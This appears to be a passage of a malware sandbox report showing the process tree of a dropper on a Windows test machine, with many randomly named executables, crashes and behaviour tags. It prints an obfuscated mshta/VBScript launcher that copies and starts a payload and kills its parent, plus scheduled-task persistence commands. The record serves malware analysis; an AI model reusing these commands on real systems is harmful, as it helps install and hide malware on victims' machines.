C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:7768
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10224
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10740
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:6896
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10140
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10804 -s 2810⤵
- Program crash
PID:9972
-
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:3800
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:9792
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10500
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:8740
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:3292
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:9700
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:2460
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:1692
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:8328
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:9572
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:5992
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:6660
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:6380
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:11240
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:1220
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:5852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 2810⤵
- Program crash
PID:10404
-
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:5976
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10212
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10228
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:8624
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10848
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10796
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10332
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10752
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:6680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6680 -s 2810⤵
- Program crash
PID:11464
-
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:11244
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:11548
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13112
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13196
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13204
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10692
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:11248
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:4532
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:12840
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:12312
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:7244
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:8852
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:2528
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13404
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:14008
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13428
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13796
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13360
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:4960
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13684
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13832
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:11352
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:9068
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4528
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13520
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13428
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13836
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:8600
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8600 -s 2810⤵
- Program crash
PID:4208
-
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:2868
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:1260
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:9936
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:12944
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:12752
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13676
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:11176
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13584
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:12948
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:11900
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:9076
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13332
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:12084
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:9768
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:15116
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:15032
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:11424
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:12104
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:14984
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:12048
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:13936
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:3516
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:15804
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:15420
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:4048
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:16364
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:2932
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:11348
-
-
-
C:\Users\Admin\Documents\19d6Lw24jE09ETDSkgBFca_u.exe"C:\Users\Admin\Documents\19d6Lw24jE09ETDSkgBFca_u.exe"8⤵PID:6636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 2409⤵
- Program crash
PID:7820
-
-
-
C:\Users\Admin\Documents\l9waFC7i8gYA_n3gNjt1P6_B.exe"C:\Users\Admin\Documents\l9waFC7i8gYA_n3gNjt1P6_B.exe"8⤵PID:6124
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\l9waFC7i8gYA_n3gNjt1P6_B.exe"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF """" == """" for %N In ( ""C:\Users\Admin\Documents\l9waFC7i8gYA_n3gNjt1P6_B.exe"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )9⤵PID:7904
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\l9waFC7i8gYA_n3gNjt1P6_B.exe" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "" == "" for %N In ("C:\Users\Admin\Documents\l9waFC7i8gYA_n3gNjt1P6_B.exe" ) do taskkill -F /Im "%~nXN"10⤵PID:5848
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F /Im "l9waFC7i8gYA_n3gNjt1P6_B.exe"11⤵
- Kills process with taskkill
PID:7732
-
-
C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exEKRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG11⤵PID:9504
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF ""-pA1IQsAATOS0kxrmeOcrgfdjncUG "" == """" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )12⤵
- Suspicious use of AdjustPrivilegeToken
PID:7416 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "-pA1IQsAATOS0kxrmeOcrgfdjncUG " == "" for %N In ("C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" ) do taskkill -F /Im "%~nXN"13⤵PID:9348
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\p_ZPP.J p12⤵PID:2384
-
-
-
-
-
-
C:\Users\Admin\Documents\wRb3Dw54wL4kb3xO9e5v3xe7.exe"C:\Users\Admin\Documents\wRb3Dw54wL4kb3xO9e5v3xe7.exe"8⤵
- Drops file in Program Files directory
PID:5772
-
-
C:\Users\Admin\Documents\8zIwjgWyoEwFmgC_Y4nZWwBf.exe"C:\Users\Admin\Documents\8zIwjgWyoEwFmgC_Y4nZWwBf.exe"8⤵
- Drops file in Program Files directory
PID:4076 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST9⤵
- Creates scheduled task(s)
PID:9916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST9⤵
- Creates scheduled task(s)
PID:9800
-
-
C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"9⤵PID:10084
-
C:\Users\Admin\Documents\MYUhkOlktuQaTyFk090UEuTc.exe"C:\Users\Admin\Documents\MYUhkOlktuQaTyFk090UEuTc.exe"10⤵PID:4244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 28011⤵
- Program crash
PID:10700
-
-
-
C:\Users\Admin\Documents\ECpA3nCbwXxSB3vuqJH3q4np.exe"C:\Users\Admin\Documents\ECpA3nCbwXxSB3vuqJH3q4np.exe"10⤵PID:9820
-
C:\Users\Admin\AppData\Roaming\5482080.exe"C:\Users\Admin\AppData\Roaming\5482080.exe"11⤵PID:11220
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 11220 -s 229212⤵
- Program crash
PID:10276
-
-
-
C:\Users\Admin\AppData\Roaming\2368077.exe"C:\Users\Admin\AppData\Roaming\2368077.exe"11⤵PID:9632
-
-
C:\Users\Admin\AppData\Roaming\4566665.exe"C:\Users\Admin\AppData\Roaming\4566665.exe"11⤵PID:10264
-
-
C:\Users\Admin\AppData\Roaming\5378296.exe"C:\Users\Admin\AppData\Roaming\5378296.exe"11⤵PID:8992
-
-
C:\Users\Admin\AppData\Roaming\7176079.exe"C:\Users\Admin\AppData\Roaming\7176079.exe"11⤵PID:1420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 236412⤵
- Program crash
PID:4240
-
-
-
-
-
-
C:\Users\Admin\Documents\7v8Ejrx_rQWrb792tJNYTGRe.exe"C:\Users\Admin\Documents\7v8Ejrx_rQWrb792tJNYTGRe.exe"8⤵PID:3520
-
-
C:\Users\Admin\Documents\bE4PE_CzBBGzIejwmqWOO68V.exe"C:\Users\Admin\Documents\bE4PE_CzBBGzIejwmqWOO68V.exe"8⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4552
-
-
C:\Users\Admin\Documents\jNQVbNZfSPJlbWJocM0r_oVW.exe"C:\Users\Admin\Documents\jNQVbNZfSPJlbWJocM0r_oVW.exe"8⤵PID:4704
-
-
C:\Users\Admin\Documents\uQknBRtQtqoyhADYwHxl4Xpr.exe"C:\Users\Admin\Documents\uQknBRtQtqoyhADYwHxl4Xpr.exe"8⤵PID:1616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 2769⤵
- Program crash
PID:8076
-
-
-
C:\Users\Admin\Documents\GDM6XF8sr34Io9eKsyCiImUe.exe"C:\Users\Admin\Documents\GDM6XF8sr34Io9eKsyCiImUe.exe"8⤵PID:7416
-
C:\Users\Admin\AppData\Roaming\1346412.exe"C:\Users\Admin\AppData\Roaming\1346412.exe"9⤵PID:10072
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 10072 -s 226810⤵
- Program crash
PID:9276
-
-
-
C:\Users\Admin\AppData\Roaming\5290578.exe"C:\Users\Admin\AppData\Roaming\5290578.exe"9⤵PID:9552
-
-
C:\Users\Admin\AppData\Roaming\7576113.exe"C:\Users\Admin\AppData\Roaming\7576113.exe"9⤵PID:8948
-
-
C:\Users\Admin\AppData\Roaming\1208328.exe"C:\Users\Admin\AppData\Roaming\1208328.exe"9⤵PID:9156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9156 -s 197210⤵
- Program crash
PID:7084
-
-
-
C:\Users\Admin\AppData\Roaming\8919817.exe"C:\Users\Admin\AppData\Roaming\8919817.exe"9⤵PID:10136
-
-
-
C:\Users\Admin\Documents\QN0D7Ntmm0zzVJs6KwgnIZoX.exe"C:\Users\Admin\Documents\QN0D7Ntmm0zzVJs6KwgnIZoX.exe"8⤵PID:8008
-
-
C:\Users\Admin\Documents\kAD5hZQnl8sPTWbdT4KBU9uM.exe"C:\Users\Admin\Documents\kAD5hZQnl8sPTWbdT4KBU9uM.exe"8⤵PID:6232
-
-
C:\Users\Admin\Documents\aSXnwzARMb93cKV1bQJG43vP.exe"C:\Users\Admin\Documents\aSXnwzARMb93cKV1bQJG43vP.exe"8⤵PID:7960
-
-
C:\Users\Admin\Documents\ISYBwXz02KCizp7HDmh7EL4k.exe"C:\Users\Admin\Documents\ISYBwXz02KCizp7HDmh7EL4k.exe"8⤵PID:7408
-
-
C:\Users\Admin\Documents\iH9T8isLYZ1vl915o_J1AQcc.exe"C:\Users\Admin\Documents\iH9T8isLYZ1vl915o_J1AQcc.exe"8⤵PID:5868
-
C:\Users\Admin\AppData\Roaming\4975652.exe"C:\Users\Admin\AppData\Roaming\4975652.exe"9⤵PID:8236
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8236 -s 227610⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:9112
-
-
-
C:\Users\Admin\AppData\Roaming\5098594.exe"C:\Users\Admin\AppData\Roaming\5098594.exe"9⤵PID:5612
-
-
-
C:\Users\Admin\Documents\26DnxdbOYHdhrecr0qtueQrY.exe"C:\Users\Admin\Documents\26DnxdbOYHdhrecr0qtueQrY.exe"8⤵PID:5004
-
-
C:\Users\Admin\Documents\x3o6Gh2C5PnUivvAIOXy4pb0.exe"C:\Users\Admin\Documents\x3o6Gh2C5PnUivvAIOXy4pb0.exe"8⤵PID:8920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8920 -s 2729⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:9184
-
-
-
C:\Users\Admin\Documents\CS890nXv0hCVBEpD8Upfh0t0.exe"C:\Users\Admin\Documents\CS890nXv0hCVBEpD8Upfh0t0.exe"8⤵PID:9056
-
C:\Users\Admin\AppData\Local\Temp\is-E9KVF.tmp\CS890nXv0hCVBEpD8Upfh0t0.tmp"C:\Users\Admin\AppData\Local\Temp\is-E9KVF.tmp\CS890nXv0hCVBEpD8Upfh0t0.tmp" /SL5="$204A0,138429,56832,C:\Users\Admin\Documents\CS890nXv0hCVBEpD8Upfh0t0.exe"9⤵
- Loads dropped DLL
PID:4800 -
C:\Users\Admin\AppData\Local\Temp\is-DD88A.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-DD88A.tmp\Setup.exe" /Verysilent10⤵PID:6500
-
-
-
-
C:\Users\Admin\Documents\eaX3Dmlkh0UQTGhBtf_Q6SYJ.exe"C:\Users\Admin\Documents\eaX3Dmlkh0UQTGhBtf_Q6SYJ.exe"8⤵PID:8888
-
C:\Users\Admin\Documents\eaX3Dmlkh0UQTGhBtf_Q6SYJ.exe"C:\Users\Admin\Documents\eaX3Dmlkh0UQTGhBtf_Q6SYJ.exe" -u9⤵PID:9820
-
-
-
-
-
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv qZIHR0hrq02NvNbKVX1Y/g.0.21⤵
- Modifies data under HKEY_USERS
PID:4892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1196 -ip 11961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1976 -ip 19761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 468 -ip 4681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3196 -ip 31961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3608
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:1424
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1180 -ip 11801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1060 -ip 10601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1360 -ip 13601⤵PID:2924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2396 -ip 23961⤵
